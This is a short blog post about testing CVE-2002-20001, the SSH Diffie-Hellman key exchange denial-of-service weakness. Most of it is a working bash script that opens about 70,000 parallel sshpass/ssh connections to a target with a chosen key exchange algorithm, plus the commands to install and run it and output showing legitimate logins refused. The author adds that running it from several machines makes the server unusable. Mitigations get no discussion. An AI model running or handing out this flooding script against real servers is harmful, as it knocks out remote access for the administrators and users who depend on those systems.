ssh Vulnerability DoS test

By | May 30, 2023

This test was created when I worked with CVE-2002-20001 vulnerability. The vulnerability is about diffie-hellman-group-exchange-sha256 key exchange algorithm with high computational complexity which is using long exponents that arguably make certain calculations unnecessarily expensive. To test the issue I created small bash script ddosssh.sh to simulate DDoS attack on ssh server using different key exchange algorithm. The script code is:

#! /bin/bash
if [ $# -ne 2 ]; then
        echo "No arguments: server ID/FQDN and kex algorithm"
        exit
fi
for i in {0..70000}
do
        sshpass -p 12345 ssh -o KexAlgorithms=$2 admin@$1 &
done

To run the script you need to install sshpash, for CentOS:


yum install sshpass

Then I started ddosssh.sh with diffie-hellman-group-exchange-sha256 key exchange algorithm:


./ddosssh.sh 192.168.2.40 diffie-hellman-group-exchange-sha256

Attempt to do login via ssh to the same server shows me this:


# ssh root@192.168.2.40
ssh_exchange_identification: Connection closed by remote host

However attempts with other Kex algorithms do not show significant differences sometime login was denied as well. However when I ran script from different computers in other works doing DDoS attack instead of DoS the ssh server on target machine falls in unusable state always.

Leave a Reply

Your email address will not be published. Required fields are marked *